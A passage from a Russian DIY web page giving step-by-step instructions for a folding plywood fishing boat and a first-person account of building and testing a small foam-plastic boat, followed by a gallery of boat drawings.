  • Основания рамы (4 доски).
  • Неподвижной стойки с кронштейном, который зафиксирован при помощи гвоздей.
  • Подвижной стойки с передвигающейся между продольными листами основания передвижной доской, укреплённого на ней кронштейна и поперечной доски на нём.
  1. Следующий этап — укрепление шпангоутов. Для этого используются болты, пропущенные сквозь отверстия и соединяющие каждый кронштейн с поперечной доской.
  2. Выступающие кронштейны и свисающие доски подровняйте по уровню шпангоутов.
  3. Теперь следует разделить на две части фанеру толщиной 4 мм и покрыть нею шпангоуты в кондукторе. Листы необходимо загнуть с наружной стороны шпангоутов и укрепить их на кондукторе.
  4. При помощи клея К-88 произведите обработку шпангоутов под фанерой и её краёв над шпангоутами.
  5. Алюминиевым листом (16х0,5 мм) укрепите границы фанеры.
  6. Теперь в шпангоуте между заклёпками просверлите отверстия диаметром 2,5-3 мм. При этом следует захватить алюминиевую полоску и фанеру.
  7. Далее необходимо вкрутить шурупы сразу в обе стороны. Теперь к шпангоутам прикрепите заготовку из фанеры, а алюминиевую полосу заверните вниз.
  8. Теперь снимите секцию с кондуктора, подравняйте её края, чтобы длина фанеры между шпангоутами оказалась меньше на 10мм. Остатки срежьте.
  9. Заготовленные планки с сечением 15х25 мм разделите на 4 равные части, одну из которых приложите к фанере и склейте. Оставшейся алюминиевой полоской оберните планки внутри шпангоутов и обейте гвоздями. С помощью 40 мм шурупов прикрепите края планок к шпангоутам. Планка борта и лист фанеры должны прилегать друг к другу герметично.
  10. При помощи уплотнителя с микропорами или другой мягкой резины обработайте одну сторону секции по всей её поверхности.
  11. Напротив отверстий в шпангоуте просверлите отверстия в резине.
  12. Таким же образом изготовьте две другие секции, за исключением носовой.
  13. Носовая часть изготавливается с помощью двух листов для каждой из сторон — левой и правой, предварительно вырезанных по чертежу.
  14. Снимите с кондуктора движущуюся стойку и уложите шпангоут на неподвижную.
  15. На основание установите форштевень.
  16. Накройте сверху толстой бумагой.
  17. Края, которые выступают, обрежьте по шаблону.
  18. Далее необходимо обшить отсек «носа». Для этого раскроите лист по форме. Алюминиевой полосой укрепите края фанеры.

Складные лодки для рыбалки легко помещаются в багажник автомобиля или небольшой прицеп.

Чертеж самодельной лодки из фанеры для рыбалки:

Видео о том, как сделать складную лодку для рыбалки

Теоретический чертеж корпуса лодки из пенопласта

Отдельные плоские детали толщиной 30 мм после склеивания образуют монолитную конструкцию. Транцы выполнены из листа вдвое большей толщины и плавно скошены по контуру. Стыкующиеся кромки соединяемых деталей срезаны на угол, как показано на эскизе лодки.

Постройку лодки из пенопласта можно разделить на три этапа: раскрой листов — изготовление деталей корпуса; подгонку деталей по стыкам — сборку; склеивание и окончательную отделку.

Схема углового соединения деталей.

Для более эффективного использования материала при раскрое листов рекомендую предварительно из плотной бумаги вырезать выкройки-шаблоны. После вырезки всех деталей по соединяемым кромкам надо срезать угол — снять фаску на величину n (см. эскиз выше), которая в зависимости от центрального угла а и толщины листа 6 определяется по формуле:

Если у вас нет уверенности в прямолинейности кромок, срезать «на угол» следует только одну из них; притыкающуюся к ней кромку придется подгонять при сборке.

Для удобства подгонки и сборки лучше всего изготовить стапель из пяти пар «поперечных» и двух пар «продольных» стоек-кильблоков, фиксирующих положение деталей днища и бортов, а также носового и кормового транцев.

Склеенный корпус на стапеле.

Склеивание можно производить любым клеем, рекомендуемым для пенопласта. Я применял эпоксидный клей на основе смолы ЭД-5. После того как клей полностью встал, прострогал свободную кромку борта и наложил на нее по всему периметру корпуса деревянный буртик — дубовую планку на клею и шурупах.

Для надежности по всем углам и стыковым соединениям на уровне верхней кромки борта снаружи наложил продольные планки из сплава АМг (полоса 1,5X20 длиной по 130 мм на сторону от оси стыка). Такой же полоской оковал и кормовой плавник, поставленный на днище.

После шпаклевки и зачистки корпус снаружи и изнутри был покрыт нитроэмалью. Такой защиты оказалось практически достаточно, поэтому вполне можно обойтись без оклейки пенопласта стеклотканью и т. п.

Съемные банки, которые служат одновременно и поперечными связями, распирающими борта, на «Гамме» сделаны деревянными. Они получатся легче, если и их вырезать из пенопласта, пустив по краям подкрепляющие деревянные рейки. Банки навешены на борта при помощи обойм — захватов, согнутых из обрезков сплава АМг. Руль навешивается на штыри, поставленные на кормовом транце.

Уже начав испытания «Гаммы», я все еще сомневался в правильности выбора материала, опасаясь за прочность пенопластового корпуса. Однако с каждым новым выходом я проникался все большим доверием к своей лодке. Плавания в самых различных условиях, перевозки и перетаскивание волоком, когда трудно исключить всевозможные удары, порой очень сильные, показали, что лодка прочна (даже, когда она не раскреплена банками) и надежна.

А о непотопляемости и говорить нечего: утопить «Гамму» практически невозможно. Есть у пенопластовой лодочки и другие специфические достоинства. Полное отсутствие набора и каких-либо сланей помогает поддерживать внутри лодки чистоту. Благодаря хорошим теплоизоляционным качествам пенопласта в лодке можно расположиться прямо на днище; когда она вытащена на берег, в ней я и устраиваюсь на ночлег, не рискуя простудиться от земли.

Рекомендуя пенопласт для изготовления легких челноков-тузиков, хочу упомянуть и об одном его минусе: он боится огня! Другими словами, следует помнить, что близость костра может испортить вашу лодку; даже прикосновение зажженной сигареты подплавляет пенопласт.

Ю. Н. Никифоров.

вернуться в раздел

Поделитесь этой страницей в соц. сетях или добавьте в закладки:

добавить страницу в избранное

Чертежи лодки из пенопласта – коллекция изображений

Заманчивая сборка «Чертежи лодки из пенопласта», которая так и манит, чтобы её скачали. Здесь на нашем сайте очень много уникальных изображений на любой случай жизни, от поздравлений с надписями, до самых крутых артов.

Чертежи лодки из пенопласта 001
Чертежи лодки из пенопласта 001
Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -


Чертежи лодки из пенопласта 002Чертежи лодки из пенопласта 003Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 004Чертежи лодки из пенопласта 005Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 006Чертежи лодки из пенопласта 007Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 008Чертежи лодки из пенопласта 009Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -

Чертежи лодки из пенопласта 010Чертежи лодки из пенопласта 011Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 012Чертежи лодки из пенопласта 013Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 014Чертежи лодки из пенопласта 015Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 016Чертежи лодки из пенопласта 017Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 018Чертежи лодки из пенопласта 019Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 020Чертежи лодки из пенопласта 021Лодка своими руками: порядок действий, выбор материала, чертежи и инструкция с фото -Чертежи лодки из пенопласта 022

Смотрите про коптеры:  Пульт радиоуправления моделями своими руками / Хабр
Оцените статью
Радиокоптер.ру
Добавить комментарий